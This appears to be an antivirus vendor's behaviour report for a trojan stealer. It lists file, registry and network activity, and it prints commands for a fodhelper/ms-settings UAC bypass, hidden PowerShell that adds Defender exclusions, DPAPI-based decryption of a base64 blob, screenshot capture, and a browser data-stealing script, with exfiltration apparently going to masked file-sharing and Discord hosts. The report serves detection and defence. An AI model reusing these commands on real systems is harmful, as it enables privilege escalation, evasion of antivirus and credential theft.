Trojan.Siggen32.58994

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[HKCU\Software\Classes\ms-settings\Shell\Open\command] '' = 'powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp';Add-MpPreference -ExclusionPath '%HOM...

Malicious functions

To complicate detection of its presence in the operating system,

adds antivirus exclusion:

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp';Add-MpPreference -ExclusionPath '%HOMEPATH%'"

Modifies file system

Creates the following files

%LOCALAPPDATA%\s0krfftw\vrq1fbe0.exe
nul
%APPDATA%\windowssystemservice\config.json
%APPDATA%\windowssystemservice\logs\service.log
%TEMP%\systemservice_readme.txt
%TEMP%\version.txt
%TEMP%\system_check_1781643916840.vbs
%TEMP%\seco_debug_log.txt
%LOCALAPPDATA%\seco-local\output\browser_forensics.py
%LOCALAPPDATA%\seco-local\2jn8plz5p69.zip
<Current directory>\seco_debug_log.txt

Deletes following files that it created itself

%TEMP%\system_check_1781643916840.vbs
%LOCALAPPDATA%\seco-local\output\browser_forensics.py
%LOCALAPPDATA%\seco-local\2jn8plz5p69.zip
%LOCALAPPDATA%\s0krfftw\vrq1fbe0.exe

Network activity

Connects to

'ap#.#ofile.io':443
'st######-par-2.gofile.io':443
'ip##fo.io':443
'pt#.#iscord.com':443

TCP

Other

'ap#.#ofile.io':443
'st######-par-2.gofile.io':443
'ip##fo.io':443
'pt#.#iscord.com':443

UDP

DNS ASK google.com
DNS ASK cl###flare.com
DNS ASK ap#.#ofile.io
DNS ASK st######-par-2.gofile.io
DNS ASK ip##fo.io
DNS ASK pt#.#iscord.com

Miscellaneous

Creates and executes the following

'%LOCALAPPDATA%\s0krfftw\vrq1fbe0.exe'
'<SYSTEM32>\cscript.exe' //nologo //B "%TEMP%\system_check_1781643916840.vbs"

Executes the following

'<SYSTEM32>\cmd.exe' /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "powershell -WindowStyle Hidden -Command \"Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp';Add-MpPreference -Ex...
'<SYSTEM32>\reg.exe' add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "powershell -WindowStyle Hidden -Command \"Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp';Add-MpPreference -ExclusionPath '%...
'<SYSTEM32>\cmd.exe' /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /d "" /f"
'<SYSTEM32>\reg.exe' add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /d "" /f
'<SYSTEM32>\cmd.exe' /d /s /c "fodhelper.exe"
'<SYSTEM32>\fodhelper.exe'
'<SYSTEM32>\cmd.exe' /d /s /c "cscript //nologo //B "%TEMP%\system_check_1781643916840.vbs""
'<SYSTEM32>\cmd.exe' /d /s /c "py -c "import sys; print(sys.version)""
'<SYSTEM32>\cmd.exe' /d /s /c "py "%LOCALAPPDATA%\seco-local\output\browser_forensics.py""
'<SYSTEM32>\cmd.exe' /d /s /c "reg delete "HKCU\Software\Classes\ms-settings" /f"
'<SYSTEM32>\reg.exe' delete "HKCU\Software\Classes\ms-settings" /f
'<SYSTEM32>\cmd.exe' /d /s /c "powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Security;$b=[Convert]::FromBase64String('AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAARffMON4uAUOCSFoZ4fGQGhAA...
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Security;$b=[Convert]::FromBase64String('AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAARffMON4uAUOCSFoZ4fGQGhAAAAAKAAAARQBkAGcAZQAAA...
'<SYSTEM32>\cmd.exe' /d /s /c "tasklist /FO CSV /NH"
'<SYSTEM32>\tasklist.exe' /FO CSV /NH
'<SYSTEM32>\cmd.exe' /d /s /c "tasklist"
'<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $bounds = [System.Windows.Forms.Screen]::Primar...
'<SYSTEM32>\tasklist.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $bounds = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds; $bitm...
'%LOCALAPPDATA%\s0krfftw\vrq1fbe0.exe' ' (with hidden window)
'<SYSTEM32>\cmd.exe' /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "powershell -WindowStyle Hidden -Command \"Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\Temp';Add-MpPreference -Ex...' (with hidden window)
'<SYSTEM32>\cmd.exe' /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /d "" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /d /s /c "fodhelper.exe"' (with hidden window)
'<SYSTEM32>\cmd.exe' /d /s /c "cscript //nologo //B "%TEMP%\system_check_1781643916840.vbs""' (with hidden window)
'<SYSTEM32>\cmd.exe' /d /s /c "py -c "import sys; print(sys.version)""' (with hidden window)
'<SYSTEM32>\cmd.exe' /d /s /c "py "%LOCALAPPDATA%\seco-local\output\browser_forensics.py""' (with hidden window)
'<SYSTEM32>\cmd.exe' /d /s /c "reg delete "HKCU\Software\Classes\ms-settings" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /d /s /c "powershell -NoProfile -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Security;$b=[Convert]::FromBase64String('AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAARffMON4uAUOCSFoZ4fGQGhAA...' (with hidden window)
'<SYSTEM32>\cmd.exe' /d /s /c "tasklist /FO CSV /NH"' (with hidden window)
'<SYSTEM32>\cmd.exe' /d /s /c "tasklist"' (with hidden window)
'<SYSTEM32>\cmd.exe' /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $bounds = [System.Windows.Forms.Screen]::Primar...' (with hidden window)

TECHNOLOGIES

TERMINOLOGIE

COURS ET EDU

MYTHES

Technical Information

Recommandations pour le traitement

Free trial